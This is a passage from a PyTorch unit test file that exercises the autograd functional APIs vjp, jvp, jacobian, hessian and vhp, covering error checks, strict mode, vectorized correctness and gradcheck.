"The given v should contain a single Tensor."): res = autogradF.vjp(foo, inp, (torch.ones_like(inp), torch.ones_like(inp))) with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"): res = autogradF.vjp(foo, inp, v[:2]) res = autogradF.vjp(foo, inp, v)[1] self._assert_same_struct(res, inp) def test_vjp_err_check_strict(self): def foo(a): return a.detach() def bar(a): # Make a non-leaf Tensor that requires_grad but that is not connected to the input return a.long().float().requires_grad_().clone() inp = torch.rand(4) v = torch.rand(4) with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."): res = autogradF.vjp(foo, inp, v, strict=True) res = autogradF.vjp(foo, inp, v, strict=False) self._assert_same_struct(res[1], inp) self.assertEqual(res[1].abs().sum(), 0.) with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"): res = autogradF.vjp(bar, inp, v, strict=True) res = autogradF.vjp(bar, inp, v, strict=False) self._assert_same_struct(res[1], inp) self.assertEqual(res[1].abs().sum(), 0.) # The Jacobian does not depend on the input def foo(a): return a.clone() inp.requires_grad_() with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."): res = autogradF.vjp(foo, inp, v, create_graph=True, strict=True) res = autogradF.vjp(foo, inp, v, create_graph=True, strict=False) self._assert_same_struct(res[1], inp) self.assertEqual(res[1], v) def test_vjp_no_grad(self): def reducer(x): return x.sum(dim=1) inputs = torch.rand(4, 4) v = torch.ones(4) with torch.no_grad(): res = autogradF.vjp(reducer, inputs, v) self.assertIsNone(res[0].grad_fn) self.assertIsNone(res[1].grad_fn) self.assertNotEqual(res[1], torch.zeros(4, 4)) inputs.requires_grad_() v.requires_grad_() with torch.no_grad(): res = autogradF.vjp(reducer, inputs, v, create_graph=True) self.assertIsNotNone(res[0].grad_fn) self.assertIsNotNone(res[1].grad_fn) self.assertNotEqual(res[1], torch.zeros(4, 4)) def test_vjp_output(self): def reducer(x): return x.sum(dim=1) inputs = torch.rand(4, 4) v = torch.ones(4) res = autogradF.vjp(reducer, inputs, v) self._assert_same_struct(res[1], inputs) self.assertIsNone(res[0].grad_fn) self.assertIsNone(res[1].grad_fn) def adder(x, y): return 2 * x + 3 * y inputs = (torch.rand(2), torch.rand(2)) v = torch.ones(2) out, vjp_val = autogradF.vjp(adder, inputs, v) self._assert_same_struct(vjp_val, inputs) self.assertIsNone(out.grad_fn) self.assertIsNone(vjp_val[0].grad_fn) self.assertIsNone(vjp_val[1].grad_fn) def adder(x, y): return 2 * x + 3 * y, x + y inputs = (torch.rand(2), torch.rand(2)) v = (torch.tensor([1., 0.]), torch.tensor([1., 0.])) out, vjp_val = autogradF.vjp(adder, inputs, v) self._assert_same_struct(vjp_val, inputs) self.assertIsNone(out[0].grad_fn) self.assertIsNone(out[1].grad_fn) self.assertIsNone(vjp_val[0].grad_fn) self.assertIsNone(vjp_val[1].grad_fn) def test_vjp_scalar(self): def reducer(x): return x.sum() inputs = torch.rand(4, 4) v = torch.ones([]) res = autogradF.vjp(reducer, inputs, v) self._assert_same_struct(res[0], v) self._assert_same_struct(res[1], inputs) res = autogradF.vjp(reducer, inputs) self._assert_same_struct(res[0], v) self._assert_same_struct(res[1], inputs) def expander(x): return x.unsqueeze(0).repeat(4) inputs = torch.rand([]) v = torch.ones(4) res = autogradF.vjp(expander, inputs, v) self._assert_same_struct(res[0], v) self._assert_same_struct(res[1], inputs) def 
test_vjp_create_graph(self): def reducer(x): return x.sum(dim=1) inputs = torch.rand(2, 2, dtype=torch.double) v = torch.ones(2, dtype=torch.double) inputs.requires_grad_() v.requires_grad_() res = autogradF.vjp(reducer, inputs, v, create_graph=True) self._assert_same_struct(res[1], inputs) self.assertIsNotNone(res[0].grad_fn) self.assertIsNotNone(res[1].grad_fn) gradcheck(lambda inp, v: autogradF.vjp(reducer, inputs, v, create_graph=True), (inputs, v)) gradgradcheck(lambda inp, v: autogradF.vjp(reducer, inputs, v, create_graph=True), (inputs, v)) def adder(x, y): return 2 * x + 3 * y, x * y inputs = (torch.rand(2, dtype=torch.double, requires_grad=True), torch.rand(2, dtype=torch.double, requires_grad=True)) v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True), torch.tensor([1., 0.], dtype=torch.double, requires_grad=True)) gradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v) gradgradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v) def foo(*args): x, y = args[:2] v = args[2:] x = x.cos() val, grad = autogradF.vjp(adder, (x, y), v, create_graph=True) return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp() gradcheck(foo, inputs + v) gradgradcheck(foo, inputs + v) def test_jvp_err_check(self): def foo(a): return 3 * a.narrow(0, 0, 3) def bar(a): return 3 * a.narrow(0, 0, 3), "bar" inp = torch.rand(4) v = torch.rand(4) with self.assertRaisesRegex(TypeError, "The inputs given to jvp must be either a Tensor"): res = autogradF.jvp(foo, (inp, 2), v) with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jvp must"): res = autogradF.jvp(bar, inp, v) with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the input to the user-provided function"): res = autogradF.jvp(foo, inp) with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."): res = autogradF.jvp(foo, inp, (v, v)) with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"): res = autogradF.jvp(foo, inp, v[:2]) res = autogradF.jvp(foo, inp, v)[1] self._assert_same_struct(res, foo(inp)) def test_jvp_err_check_strict(self): def foo(a): return a.detach() def bar(a): # Make a non-leaf Tensor that requires_grad but that is not connected to the input return a.long().float().requires_grad_().clone() inp = torch.rand(4) v = torch.rand(4) with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."): res = autogradF.jvp(foo, inp, v, strict=True) res = autogradF.jvp(foo, inp, v, strict=False) self._assert_same_struct(res[1], res[0]) self.assertEqual(res[1].abs().sum(), 0.) with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"): res = autogradF.jvp(bar, inp, v, strict=True) res = autogradF.jvp(bar, inp, v, strict=False) self._assert_same_struct(res[1], res[0]) self.assertEqual(res[1].abs().sum(), 0.) 
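        # Same strict-mode contract as the vjp tests above, but for forward-mode
        # jvp: strict=True raises on detached or unrelated outputs, while
        # strict=False silently returns zeros of the matching structure.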
# The Jacobian does not depend on the input def foo(a): return a.clone() inp.requires_grad_() with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."): res = autogradF.jvp(foo, inp, v, create_graph=True, strict=True) res = autogradF.jvp(foo, inp, v, create_graph=True, strict=False) self._assert_same_struct(res[1], inp) self.assertEqual(res[1], v) def test_jvp_no_grad(self): def reducer(x): return x.sum(dim=1) inputs = torch.rand(4, 4) v = torch.ones(4, 4) with torch.no_grad(): res = autogradF.jvp(reducer, inputs, v) self.assertIsNone(res[0].grad_fn) self.assertIsNone(res[1].grad_fn) self.assertNotEqual(res[1], torch.zeros(4, 4)) inputs.requires_grad_() v.requires_grad_() with torch.no_grad(): res = autogradF.jvp(reducer, inputs, v, create_graph=True) self.assertIsNotNone(res[0].grad_fn) self.assertIsNotNone(res[1].grad_fn) self.assertNotEqual(res[1], torch.zeros(4, 4)) def test_jvp_output(self): def reducer(x): return x.sum(dim=1) inputs = torch.rand(4, 4) v = torch.ones(4, 4) res = autogradF.jvp(reducer, inputs, v) self._assert_same_struct(res[1], res[0]) self.assertIsNone(res[0].grad_fn) self.assertIsNone(res[1].grad_fn) def adder(x, y): return 2 * x + 3 * y inputs = (torch.rand(2), torch.rand(2)) v = (torch.ones(2), torch.ones(2)) out, jvp_val = autogradF.jvp(adder, inputs, v) self._assert_same_struct(jvp_val, out) self.assertIsNone(out.grad_fn) self.assertIsNone(jvp_val[0].grad_fn) self.assertIsNone(jvp_val[1].grad_fn) def adder(x, y): return 2 * x + 3 * y, x + y inputs = (torch.rand(2), torch.rand(2)) v = (torch.tensor([1., 0.]), torch.tensor([1., 0.])) out, jvp_val = autogradF.jvp(adder, inputs, v) self._assert_same_struct(jvp_val, out) self.assertIsNone(out[0].grad_fn) self.assertIsNone(out[1].grad_fn) self.assertIsNone(jvp_val[0].grad_fn) self.assertIsNone(jvp_val[1].grad_fn) def test_jvp_scalar(self): def reducer(x): return x.sum() inputs = torch.rand(4, 4) v = torch.ones(4, 4) res = autogradF.jvp(reducer, inputs, v) self._assert_same_struct(res[0], torch.zeros([])) self._assert_same_struct(res[1], res[0]) def expander(x): return x.unsqueeze(0).repeat(4) inputs = torch.rand([]) v = torch.ones([]) res = autogradF.jvp(expander, inputs, v) self._assert_same_struct(res[0], torch.zeros(4)) self._assert_same_struct(res[1], res[0]) res = autogradF.jvp(expander, inputs) self._assert_same_struct(res[0], torch.zeros(4)) self._assert_same_struct(res[1], res[0]) def test_jvp_create_graph(self): def reducer(x): return x.sum(dim=1) inputs = torch.rand(2, 2, dtype=torch.double) v = torch.ones(2, 2, dtype=torch.double) inputs.requires_grad_() v.requires_grad_() res = autogradF.jvp(reducer, inputs, v, create_graph=True) self._assert_same_struct(res[1], res[0]) self.assertIsNotNone(res[0].grad_fn) self.assertIsNotNone(res[1].grad_fn) gradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v)) gradgradcheck(lambda inp, v: autogradF.jvp(reducer, inp, v, create_graph=True), (inputs, v)) def adder(x, y): return 2 * x + 3 * y, x * y inputs = (torch.rand(2, dtype=torch.double, requires_grad=True), torch.rand(2, dtype=torch.double, requires_grad=True)) v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True), torch.tensor([1., 0.], dtype=torch.double, requires_grad=True)) gradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v) gradgradcheck(lambda *args: autogradF.jvp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v) def foo(*args): x, y = args[:2] v = 
args[2:]
            x = x.cos()
            val, grad = autogradF.jvp(adder, (x, y), v, create_graph=True)
            return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp()

        gradcheck(foo, inputs + v)
        gradgradcheck(foo, inputs + v)

    def _test_construct_standard_basis_for(self, inputs):
        numels = tuple(tensor.numel() for tensor in inputs)
        results = autogradF._construct_standard_basis_for(inputs, numels)
        for result, inp in zip(results, inputs):
            self.assertEqual(result.dtype, inp.dtype)
            self.assertEqual(result.device, inp.device)
        results = torch.cat([result.to(device='cpu', dtype=torch.float) for result in results], dim=1)
        expected = torch.eye(results[0].shape[0], dtype=torch.float)
        self.assertEqual(results, expected)

    def test_construct_standard_basis_for(self):
        test_cases = [
            (torch.randn(2, 3),),
            (torch.randn(1),),
            (torch.randn([]),),
            (torch.randn(1), torch.randn([]), torch.randn([])),
            (torch.randn(2), torch.randn(3), torch.randn([])),
            (torch.randn(2), torch.randn([]), torch.randn(3)),
            (torch.randn(2, 3), torch.randn(3), torch.randn(3, 4, 2)),
            (torch.randn(2, dtype=torch.float64), torch.randn(3, dtype=torch.float32)),
        ]

        for inputs in test_cases:
            self._test_construct_standard_basis_for(inputs)

    @unittest.skipIf(not TEST_CUDA, "test requires CUDA")
    def test_construct_standard_basis_for_cuda(self):
        test_cases = [
            (torch.randn(2), torch.randn(3, device='cuda')),
            (torch.randn(3, device='cuda'), torch.randn(2)),
        ]

        for inputs in test_cases:
            self._test_construct_standard_basis_for(inputs)

    def _test_vectorize_raises_no_warnings(self, api):
        # vmap is an experimental prototype. When someone calls torch.vmap,
        # it raises a python warning. This test checks that
        # autogradF.{jacobian, hessian} don't raise that experimental prototype
        # warning; it is not nice for a public-facing API to raise a warning
        # no matter how it is called.
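        # Background (descriptive note, not exercised beyond the check below):
        # vectorize=True asks jacobian()/hessian() to batch the per-row autograd
        # calls through the vmap prototype instead of looping over outputs, e.g.
        #
        #     J = autogradF.jacobian(lambda x: x ** 2, torch.randn(3), vectorize=True)
        #
        # so this helper simply asserts that this code path stays silent.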
        def foo(a):
            return (a ** 2).sum()

        x = torch.randn(3)
        with warnings.catch_warnings(record=True) as wa:
            result = api(foo, x, vectorize=True)
        self.assertEqual(len(wa), 0)

    def test_jacobian_vectorize_raises_no_warnings(self):
        return self._test_vectorize_raises_no_warnings(autogradF.jacobian)

    def test_hessian_vectorize_raises_no_warnings(self):
        return self._test_vectorize_raises_no_warnings(autogradF.hessian)

    def _test_jacobian_err_check(self, vectorize):
        def foo(a):
            return 3 * a.narrow(0, 0, 3)

        def bar(a):
            return 3 * a.narrow(0, 0, 3), "bar"

        inp = torch.rand(4)
        with self.assertRaisesRegex(TypeError, "The inputs given to jacobian must be either a Tensor"):
            res = autogradF.jacobian(foo, (inp, 2), vectorize=vectorize)

        with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jacobian must"):
            res = autogradF.jacobian(bar, inp, vectorize=vectorize)

        res = autogradF.jacobian(foo, inp, vectorize=vectorize)
        self._assert_interleaved_struct(res, foo(inp), inp)

        def foo(a, b):
            return b, 3 * a.narrow(0, 0, 3)

        inp = (torch.rand(4), torch.rand(5))
        res = autogradF.jacobian(foo, inp, vectorize=vectorize)
        self._assert_interleaved_struct(res, foo(*inp), inp)

    def test_jacobian_err_check(self):
        return self._test_jacobian_err_check(vectorize=False)

    def test_jacobian_err_check_vectorize(self):
        return self._test_jacobian_err_check(vectorize=True)

    def test_jacobian_err_check_strict(self):
        def foo(a):
            return a.detach()

        def bar(a):
            # Make a non-leaf Tensor that requires_grad but that is not connected to the input
            return a.long().float().requires_grad_().clone()

        inp = torch.rand(4)
        with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
            res = autogradF.jacobian(foo, inp, strict=True)
        res = autogradF.jacobian(foo, inp, strict=False)
        self._assert_interleaved_struct(res, foo(inp), inp)
        self.assertEqual(res.abs().sum(), 0.)

        with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function is independent of input 0."):
            res = autogradF.jacobian(bar, inp, strict=True)
        res = autogradF.jacobian(bar, inp, strict=False)
        self._assert_interleaved_struct(res, foo(inp), inp)
        self.assertEqual(res.abs().sum(), 0.)
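        # Summary of strict mode as exercised here: with strict=True, jacobian()
        # raises when an output does not require grad or is independent of an
        # input; with strict=False the corresponding block of the result is
        # silently filled with zeros (checked via res.abs().sum() == 0 above).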
# The Jacobian does not depend on the input def foo(a): return a.clone() inp.requires_grad_() with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."): res = autogradF.jacobian(foo, inp, create_graph=True, strict=True) res = autogradF.jacobian(foo, inp, create_graph=True, strict=False) self._assert_interleaved_struct(res, inp, inp) self.assertEqual(res, torch.eye(4)) def test_jacobian_err_check_strict_vectorize(self): def foo(x): return x inp = torch.rand(4) with self.assertRaisesRegex(RuntimeError, "not supported together"): res = autogradF.jacobian(foo, inp, strict=True, vectorize=True) def test_jacobian_no_grad(self): def exp_reducer(x): return x.exp().sum(dim=1) inputs = torch.rand(4, 4) with torch.no_grad(): res = autogradF.jacobian(exp_reducer, inputs) self.assertIsNone(res.grad_fn) self.assertNotEqual(res, torch.zeros(4, 4)) with torch.no_grad(): res = autogradF.jacobian(exp_reducer, inputs, create_graph=True) self.assertIsNotNone(res.grad_fn) self.assertNotEqual(res, torch.zeros(4, 4)) def _test_jacobian_output(self, vectorize): def exp_reducer(x): return x.exp().sum(dim=1) inputs = torch.rand(4, 4) res = autogradF.jacobian(exp_reducer, inputs, vectorize=vectorize) self._assert_interleaved_struct(res, exp_reducer(inputs), inputs) self.assertIsNone(res.grad_fn) def identity(x): return x.clone() inputs = torch.rand(4) res = autogradF.jacobian(identity, inputs, vectorize=vectorize) self._assert_interleaved_struct(res, identity(inputs), inputs) self.assertIsNone(res.grad_fn) self.assertEqual(res, torch.eye(4)) def add_exp_reducer(x, y): return (x + y.exp()).sum(dim=1) inputs = (torch.rand(4, 4), torch.rand(4, 4)) res = autogradF.jacobian(add_exp_reducer, inputs, vectorize=vectorize) self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs) self.assertIsNone(res[0].grad_fn) self.assertIsNone(res[1].grad_fn) def test_jacobian_output(self): self._test_jacobian_output(vectorize=False) def test_jacobian_output_vectorize(self): self._test_jacobian_output(vectorize=True) def _test_jacobian_scalar(self, vectorize): def reducer(x): return x.sum() inputs = torch.rand(4, 4) res = autogradF.jacobian(reducer, inputs, vectorize=vectorize) self._assert_same_struct(res, inputs) def expander(x): return x.unsqueeze(0).repeat(4) inputs = torch.rand([]) res = autogradF.jacobian(expander, inputs, vectorize=vectorize) self._assert_same_struct(res, torch.zeros(4)) def test_jacobian_scalar(self): self._test_jacobian_scalar(vectorize=False) def test_jacobian_scalar_vectorize(self): self._test_jacobian_scalar(vectorize=True) def _test_jacobian_create_graph(self, vectorize): def exp_reducer(x): return x.exp().sum(dim=1) inputs = torch.rand(4, 4, dtype=torch.double, requires_grad=True) res = autogradF.jacobian(exp_reducer, inputs, create_graph=True, vectorize=vectorize) self._assert_interleaved_struct(res, exp_reducer(inputs), inputs) self.assertIsNotNone(res.grad_fn) gradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs) gradgradcheck(lambda inp: autogradF.jacobian(exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs) def add_exp_reducer(x, y): return (x + y).exp().sum(dim=1) inputs = (torch.rand(4, 4, dtype=torch.double, requires_grad=True), torch.rand(4, 4, dtype=torch.double, requires_grad=True)) res = autogradF.jacobian(add_exp_reducer, inputs, create_graph=True, vectorize=vectorize) self._assert_interleaved_struct(res, add_exp_reducer(*inputs), inputs) 
self.assertIsNotNone(res[0].grad_fn) self.assertIsNotNone(res[1].grad_fn) gradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs) gradgradcheck(lambda *inp: autogradF.jacobian(add_exp_reducer, inp, create_graph=True, vectorize=vectorize), inputs) def foo(x, y): x = x.cos() val, jac = autogradF.jacobian(add_exp_reducer, (x, y), create_graph=True, vectorize=vectorize) res = val[0].exp().sum() + val[1].exp().sum() + jac[0].exp().sum() res = res + jac[1].exp().sum() + x.exp().sum() + y.exp().sum() return res gradcheck(foo, inputs) gradgradcheck(foo, inputs) def test_jacobian_create_graph(self): self._test_jacobian_create_graph(vectorize=False) def test_jacobian_create_graph_vectorize(self): self._test_jacobian_create_graph(vectorize=True) def _check_jacobian_vectorize_correctness(self, f, inputs): expected = autogradF.jacobian(f, inputs, vectorize=False) result = autogradF.jacobian(f, inputs, vectorize=True) self.assertEqual(result, expected) def test_jacobian_vectorize_correctness_simple(self): def f(x): return 3 * x ** 2 x = torch.randn(2, 3, 5) self._check_jacobian_vectorize_correctness(f, x) def test_jacobian_vectorize_correctness_multi_input(self): def f(x, y): return (x.cos() * x) @ y.sin() x = torch.randn(2, 3) y = torch.randn(3, 5) self._check_jacobian_vectorize_correctness(f, (x, y)) def test_jacobian_vectorize_correctness_multi_input_multi_output(self): def f(x, y): return (x * x) @ y, x @ (x.sum(1) * y), y.sum() x = torch.randn(5, 3) y = torch.randn(3, 5) self._check_jacobian_vectorize_correctness(f, (x, y)) def test_jacobian_vectorize_correctness_unrelated_outputs(self): def f(x, y): return x, y, x, y x = torch.randn(2) y = torch.randn(3) self._check_jacobian_vectorize_correctness(f, (x, y)) def test_jacobian_vectorize_correctness_zero_dim(self): # zero-dim output def f(x, y): return x.sum(), y.sum(), x * y x = torch.randn(3) y = torch.randn(3) self._check_jacobian_vectorize_correctness(f, (x, y)) # zero-dim input def g(x): return torch.stack([x, x, x]) x = torch.randn([]) self._check_jacobian_vectorize_correctness(g, x) # Mixed zero-dim input / zero-dim output def h(x, y): return y.sum(), x * y x = torch.randn([]) y = torch.randn(1) self._check_jacobian_vectorize_correctness(h, (x, y)) @unittest.skipIf(not TEST_CUDA, "test requires CUDA") def test_jacobian_vectorize_correctness_different_devices(self): def f(x, y): return x * y, (x * y).cuda() x = torch.randn(3) y = torch.randn(3) self._check_jacobian_vectorize_correctness(f, (x, y)) def test_jacobian_vectorize_correctness_different_dtype(self): def f(x, y): return (x * y).float(), (x * y).double() x = torch.randn(3) y = torch.randn(3) self._check_jacobian_vectorize_correctness(f, (x, y)) def _check_hessian_vectorize_correctness(self, f, inputs): expected = autogradF.hessian(f, inputs, vectorize=False) result = autogradF.hessian(f, inputs, vectorize=True) self.assertEqual(result, expected) def test_hessian_vectorize_correctness_simple(self): def f(x): return (3 * x ** 2).sum() x = torch.randn(2, 3, 5) self._check_hessian_vectorize_correctness(f, x) def test_hessian_vectorize_correctness_multi_input(self): def f(x, y, z): return ((x.relu() * x) @ y.sin() @ z).sum() x = torch.randn(2, 3) y = torch.randn(3, 5) z = torch.randn(5, 5) self._check_hessian_vectorize_correctness(f, (x, y, z)) def test_hessian_vectorize_correctness_unrelated_outputs(self): # output unrelated to one input def f(x, y): return (x ** 2).sum() x = torch.randn(2) y = torch.randn(3) 
self._check_hessian_vectorize_correctness(f, (x, y)) # output unrelated to all inputs def f(x, y): return torch.randn([]) x = torch.randn(2) y = torch.randn(3) self._check_hessian_vectorize_correctness(f, (x, y)) def _test_hessian_err_check(self, vectorize): def foo(a): return 3 * a.narrow(0, 0, 3).exp().sum() def bar(a): return 3 * a.narrow(0, 0, 3), "bar" def bar2(a): return 3 * a.narrow(0, 0, 3) def bar3(a): return 3 * a.narrow(0, 0, 3), 3 * a.narrow(0, 0, 3) inp = torch.rand(4) with self.assertRaisesRegex(TypeError, "The inputs given to hessian must be either a Tensor"): res = autogradF.hessian(foo, (inp, 2), vectorize=vectorize) with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to hessian must"): res = autogradF.hessian(bar, inp, vectorize=vectorize) err_msg_out = "The Tensor returned by the function given to hessian should contain a single element" with self.assertRaisesRegex(RuntimeError, err_msg_out): res = autogradF.hessian(bar2, inp, vectorize=vectorize) with self.assertRaisesRegex(RuntimeError, "The function given to hessian should return a single Tensor"): res = autogradF.hessian(bar3, inp, vectorize=vectorize) res = autogradF.hessian(foo, inp, vectorize=vectorize) self._assert_interleaved_struct(res, inp, inp) def foo(a, b): return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum() inp = (torch.rand(4), torch.rand(5)) res = autogradF.hessian(foo, inp, vectorize=vectorize) self._assert_interleaved_struct(res, inp, inp) def test_hessian_err_check(self): self._test_hessian_err_check(vectorize=False) def test_hessian_err_check_vectorize(self): self._test_hessian_err_check(vectorize=True) def test_hessian_err_check_strict(self): def foo(a): return a.detach().sum() def bar(a): # Make a non-leaf Tensor that requires_grad but that is not connected to the input return a.long().float().requires_grad_().clone().sum() def bar2(a): # A Linear function for which the jacobian is independent of the input return (3 * a).sum() inp = torch.rand(4) with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."): res = autogradF.hessian(foo, inp, strict=True) res = autogradF.hessian(foo, inp, strict=False) self._assert_interleaved_struct(res, inp, inp) self.assertEqual(res.abs().sum(), 0.) with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0"): res = autogradF.hessian(bar, inp, strict=True) res = autogradF.hessian(bar, inp, strict=False) self._assert_interleaved_struct(res, inp, inp) self.assertEqual(res.abs().sum(), 0.) with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function with respect to input 0 is"): res = autogradF.hessian(bar2, inp, strict=True) res = autogradF.hessian(bar2, inp, strict=False) self._assert_interleaved_struct(res, inp, inp) self.assertEqual(res.abs().sum(), 0.) 
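    # A small usage sketch (kept separate from the error-checking tests above) of the
    # two dense torch.autograd.functional APIs exercised in this class: jacobian builds
    # the full Jacobian of a function, hessian the full Hessian of a scalar-valued one.
    # The helper name below is illustrative only and is not referenced by any test.
    def _example_jacobian_and_hessian_usage(self):
        import torch
        import torch.autograd.functional as autogradF

        def vector_fn(x):
            return x.exp()

        def scalar_fn(x):
            return (x ** 3).sum()

        x = torch.rand(3)
        jac = autogradF.jacobian(vector_fn, x)   # shape (3, 3), equals diag(exp(x))
        hess = autogradF.hessian(scalar_fn, x)   # shape (3, 3), equals diag(6 * x)
        return jac, hess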
def test_hessian_err_check_strict_vectorize(self): def foo(x): return (x ** 3).sum() inp = torch.rand(4) with self.assertRaisesRegex(RuntimeError, "not supported together"): res = autogradF.hessian(foo, inp, strict=True, vectorize=True) def test_hessian_no_grad(self): def pow_reducer(x): return x.pow(3).sum() inputs = torch.rand(2, 2) with torch.no_grad(): res = autogradF.hessian(pow_reducer, inputs) self.assertIsNone(res[0][0].grad_fn) self.assertIsNone(res[0][1].grad_fn) self.assertIsNone(res[1][0].grad_fn) self.assertIsNone(res[1][1].grad_fn) self.assertNotEqual(res, torch.zeros(2, 2, 2)) with torch.no_grad(): res = autogradF.hessian(pow_reducer, inputs, create_graph=True) self.assertIsNotNone(res[0][0].grad_fn) self.assertIsNotNone(res[0][1].grad_fn) self.assertIsNotNone(res[1][0].grad_fn) self.assertIsNotNone(res[1][1].grad_fn) self.assertNotEqual(res, torch.zeros(2, 2, 2)) def _test_hessian_output(self, vectorize): def pow_reducer(x): return x.pow(3).sum() inputs = torch.rand(2, 2) res = autogradF.hessian(pow_reducer, inputs, vectorize=vectorize) self._assert_interleaved_struct(res, inputs, inputs) self.assertIsNone(res.grad_fn) def add_pow_reducer(x, y): return (x + y).pow(3).sum() inputs = (torch.rand(2, 2), torch.rand(2, 2)) res = autogradF.hessian(add_pow_reducer, inputs, vectorize=vectorize) self._assert_interleaved_struct(res, inputs, inputs) self.assertIsNone(res[0][0].grad_fn) self.assertIsNone(res[0][1].grad_fn) self.assertIsNone(res[1][0].grad_fn) self.assertIsNone(res[1][1].grad_fn) def test_hessian_output(self): self._test_hessian_output(vectorize=False) def test_hessian_output_vectorize(self): self._test_hessian_output(vectorize=True) def _test_hessian_scalar(self, vectorize): def reducer(x): return x.sum() inputs = torch.rand(4, 4) res = autogradF.hessian(reducer, inputs, vectorize=vectorize) self._assert_interleaved_struct(res, inputs, inputs) inputs = torch.rand([]) res = autogradF.hessian(reducer, inputs, vectorize=vectorize) self._assert_same_struct(res, inputs) def bad_reducer(x): return x.sum().view(1, 1, 1) inputs = torch.rand(4, 4) res = autogradF.hessian(bad_reducer, inputs, vectorize=vectorize) self._assert_interleaved_struct(res, inputs, inputs) def test_hessian_scalar(self): return self._test_hessian_scalar(vectorize=False) def test_hessian_scalar_vectorize(self): return self._test_hessian_scalar(vectorize=True) def _test_hessian_create_graph(self, vectorize): def pow_reducer(x): return x.pow(3).sum() inputs = torch.rand(2, 2, dtype=torch.double, requires_grad=True) res = autogradF.hessian(pow_reducer, inputs, create_graph=True, vectorize=vectorize) self._assert_interleaved_struct(res, inputs, inputs) self.assertIsNotNone(res.grad_fn) gradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs) gradgradcheck(lambda inp: autogradF.hessian(pow_reducer, inp, create_graph=True, vectorize=vectorize), inputs) def add_pow_reducer(x, y): return (x + y).pow(3).sum() inputs = (torch.rand(2, 2, dtype=torch.double, requires_grad=True), torch.rand(2, 2, dtype=torch.double, requires_grad=True)) res = autogradF.hessian(add_pow_reducer, inputs, create_graph=True, vectorize=vectorize) self._assert_interleaved_struct(res, inputs, inputs) self.assertIsNotNone(res[0][0].grad_fn) self.assertIsNotNone(res[0][1].grad_fn) self.assertIsNotNone(res[1][0].grad_fn) self.assertIsNotNone(res[1][1].grad_fn) def flatten(inp): return tuple(el_lvl2 for el_lvl1 in inp for el_lvl2 in el_lvl1) gradcheck(lambda *inp: 
flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs) gradgradcheck(lambda *inp: flatten(autogradF.hessian(add_pow_reducer, inp, create_graph=True, vectorize=vectorize)), inputs) def foo(x, y): x = x.cos() val, hess = autogradF.hessian(add_pow_reducer, (x, y), create_graph=True, vectorize=vectorize) res = val[0].cos().sum() + val[1].cos().sum() + hess[0].cos().sum() res = res + hess[1].cos().sum() + x.cos().sum() + y.cos().sum() return res gradcheck(foo, inputs) gradgradcheck(foo, inputs) def test_hessian_create_graph(self): self._test_hessian_create_graph(vectorize=False) def test_hessian_create_graph_vectorize(self): self._test_hessian_create_graph(vectorize=True) def test_vhp_err_check(self): def foo(a): return 3 * a.narrow(0, 0, 3).exp().sum() def bar(a): return 3 * a.narrow(0, 0, 3), "bar" def bar2(a): return 3 * a.narrow(0, 0, 3) inp = torch.rand(4) v = torch.rand(4) with self.assertRaisesRegex(TypeError, "The inputs given to vhp must be either a Tensor"): res = autogradF.vhp(foo, (inp, 2), v) with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vhp must"): res = autogradF.vhp(bar, inp, v) err_msg_out = "The Tensor returned by the function given to vhp should contain a single element" with self.assertRaisesRegex(RuntimeError, err_msg_out): res = autogradF.vhp(bar2, inp, v) with self.assertRaisesRegex(RuntimeError, "v has invalid size:"): res = autogradF.vhp(foo, inp, torch.rand(5)) with self.assertRaisesRegex(TypeError, "The v given to vhp must be either a Tensor or a tuple of Tensors"): res = autogradF.vhp(foo, inp, (v, 2)) res = autogradF.vhp(foo, inp, v) self._assert_same_struct(res[1], inp) def foo(a, b): return (3 * b.narrow(0, 0, 3) * a.narrow(0, 0, 3)).sum() inp = (torch.rand(4), torch.rand(5)) v = (torch.rand(4), torch.rand(5)) res = autogradF.vhp(foo, inp, v) self._assert_same_struct(res[1], inp) def test_vhp_err_check_strict(self): def foo(a): return a.detach().sum() def bar(a): # Make a non-leaf Tensor that requires_grad but that is not connected to the input return a.long().float().requires_grad_().clone().sum() def bar2(a): # A Linear function for which the jacobian is 